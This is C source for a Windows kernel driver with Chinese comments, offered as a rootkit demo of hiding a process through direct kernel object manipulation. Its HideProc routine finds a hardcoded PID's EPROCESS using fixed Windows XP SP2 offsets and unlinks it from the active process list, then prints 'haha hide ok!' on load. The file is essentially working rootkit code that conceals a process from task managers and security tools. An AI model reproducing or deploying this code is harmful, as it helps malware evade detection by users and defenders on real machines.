fristdriver.c

Hiding process with DKOM ！采用断开系统中进程的双向链表方式

/////////////////////////////////////////////////
// 

#include <ntddk.h>
//#include "IoCTL.h"

// 自定义函数的声明
NTSTATUS DispatchCreateClose(PDEVICE_OBJECT pDevObj, PIRP pIrp);
void DriverUnload(PDRIVER_OBJECT pDriverObj);
NTSTATUS DispatchIoctl(PDEVICE_OBJECT pDevObj, PIRP pIrp);
ULONG FindProcessEPROC (ULONG terminate_PID);
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegistryString);
NTSTATUS HideProc();



// 驱动内部名称和符号连接名称
#define DEVICE_NAME L"\\Device\\devDriverDemo"
#define LINK_NAME L"\\??\\slDriverDemo"



// FindProcessEPROC takes the PID of the process to find and

// returns the address of the EPROCESS structure for the desired process.

ULONG FindProcessEPROC (ULONG terminate_PID)

{
	//这个函数用来获得指定PID的 EPROCESS偏移
	PLIST_ENTRY plist_active_procs;

	ULONG eproc;
	ULONG PIDOFFSET,current_PID,start_PID, i_count,FLINKOFFSET;

	eproc   = 0x00000000;
	PIDOFFSET = 0x84;   //SP2
	FLINKOFFSET = 0x88;
	current_PID = 0;
	start_PID   = 0;
	i_count = 0;

	

	if (terminate_PID == 0)

		return terminate_PID;

	// Get the address of the current EPROCESS

	eproc = (ULONG) PsGetCurrentProcess();   //KTHREAD

	start_PID = *((ULONG *)(eproc+PIDOFFSET)); //PID

	current_PID = start_PID;

	while(1)

	{

		if(terminate_PID == current_PID) // found

			return eproc;

		else if((i_count >= 1) && (start_PID == current_PID))

		{
			//当整个进程都遍历完成却没有找到这个PID的时候 才会出现这种情况

			return 0x00000000;

		}

		else { // Advance in the list.

			plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);   //LIST

			eproc = (ULONG) plist_active_procs->Flink;   //the flink of the next list entry

			eproc = eproc - FLINKOFFSET; //the next EPROCESS

			current_PID = *((ULONG *)(eproc+PIDOFFSET));  //THE NEXT PID

			i_count++;

			}

	}

}





NTSTATUS HideProc()
{

	PLIST_ENTRY plist_active_procs;
	ULONG FLINKOFFSET,eproc;
	// Find the EPROCESS to hide.

	eproc = FindProcessEPROC(468);
	FLINKOFFSET = 0x88;

	if (eproc == 0x00000000)
	{
		
		DbgPrint("can't find the eproc!!");

		return STATUS_INVALID_PARAMETER;
	}
	plist_active_procs = (LIST_ENTRY *)(eproc+FLINKOFFSET);

	// Change the FLINK and BLINK of the rearward and forward EPROCESS blocks.

	*((ULONG *)plist_active_procs->Blink) = (ULONG) plist_active_procs->Flink;  //动作一

	*((ULONG *)plist_active_procs->Flink+1) = (ULONG) plist_active_procs->Blink; //动作二

	// Change the FLINK and BLINK of the process we are hiding so that when

	// it is dereferenced, it points to a valid memory region.

	plist_active_procs->Flink = (LIST_ENTRY *) &(plist_active_procs->Flink);

	plist_active_procs->Blink = (LIST_ENTRY *) &(plist_active_procs->Flink);

	//这里一定要把flink blink指向自己的link 不然BSOD郁闷死你

	return STATUS_SUCCESS;

}
// 驱动程序加载时调用DriverEntry例程
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegistryString)
{
	////////////////初始化动作////////////////////////////////
	NTSTATUS status;
	UNICODE_STRING ustrDevName;
	UNICODE_STRING ustrLinkName;
	PDEVICE_OBJECT pDevObj;

	status = STATUS_SUCCESS;

	// 初始化各个派遣例程
	pDriverObj->MajorFunction[IRP_MJ_CREATE] = DispatchCreateClose;
	pDriverObj->MajorFunction[IRP_MJ_CLOSE] = DispatchCreateClose;
	//pDriverObj->MajorFunction[IRP_MJ_DEVICE_CONTROL]=DispatchIoctl;
	pDriverObj->DriverUnload = DriverUnload ;

	// 创建、初始化设备对象
	// 设备名称

	RtlInitUnicodeString(&ustrDevName, DEVICE_NAME);
	// 创建设备对象

	status = IoCreateDevice(pDriverObj, 
		0,
		&ustrDevName, 
		FILE_DEVICE_UNKNOWN,
		0,
		FALSE,
		&pDevObj);
	if(!NT_SUCCESS(status))
	{
		return status;
	}

	// 创建符号连接名称
	// 符号连接名称

	RtlInitUnicodeString(&ustrLinkName, LINK_NAME);
	// 创建关联
	status = IoCreateSymbolicLink(&ustrLinkName, &ustrDevName);  
	if(!NT_SUCCESS(status))
	{
		IoDeleteDevice(pDevObj);  
		return status;
	}
	////////////////////////初始化完毕////////////////////////////////////////

	if(STATUS_SUCCESS == HideProc())
		DbgPrint("haha hide ok!");

	return STATUS_SUCCESS;

}



// I/O控制派遣例程
/*NTSTATUS DispatchIoctl(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
	///////////////////////DispatchIoctl///////////////////////////////
	NTSTATUS IoCtlNtstus;
	PIO_STACK_LOCATION pIRPStack;
	ULONG uIoControlCode;
	PVOID pIoBuffer;
	ULONG uInSize;
	ULONG uOutSize ;

	//假设失败
	IoCtlNtstus = STATUS_INVALID_DEVICE_REQUEST;

	//IRP堆栈
	pIRPStack = IoGetCurrentIrpStackLocation(pIrp);

	//控制代码
	uIoControlCode = pIRPStack->Parameters.DeviceIoControl.IoControlCode;
	uInSize = pIRPStack->Parameters.DeviceIoControl.InputBufferLength;
	uOutSize = pIRPStack->Parameters.DeviceIoControl.OutputBufferLength;
	//
	pIoBuffer= pIrp-> AssociatedIrp.SystemBuffer;


	switch(uIoControlCode)
	{
		case IO_PID_CTL
		{
			IoCtlNtstus = STATUS_SUCCESS;
		}
		break;
	}
	//完成请求

	if(IoCtlNtstus == STATUS_SUCCESS)
		pIrp->IoStatus.Information = uOutSize;
	else
		pIrp->IoStatus.Information = 0;


	// 完成请求

	pIrp->IoStatus.Status = IoCtlNtstus;
	IoCompleteRequest(pIrp, IO_NO_INCREMENT);

	return IoCtlNtstus;

}*/


void DriverUnload(PDRIVER_OBJECT pDriverObj)
{


	UNICODE_STRING strLink;
	/////收尾工作 /////////////////////////////////


	DbgPrint("unload");
	// 删除符号连接名称

	RtlInitUnicodeString(&strLink, LINK_NAME);
	IoDeleteSymbolicLink(&strLink);

	// 删除设备对象
	IoDeleteDevice(pDriverObj->DeviceObject);
}

// 处理IRP_MJ_CREATE、IRP_MJ_CLOSE功能代码
NTSTATUS DispatchCreateClose(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
	pIrp->IoStatus.Status = STATUS_SUCCESS;
	// 完成此请求


	IoCompleteRequest(pIrp, IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}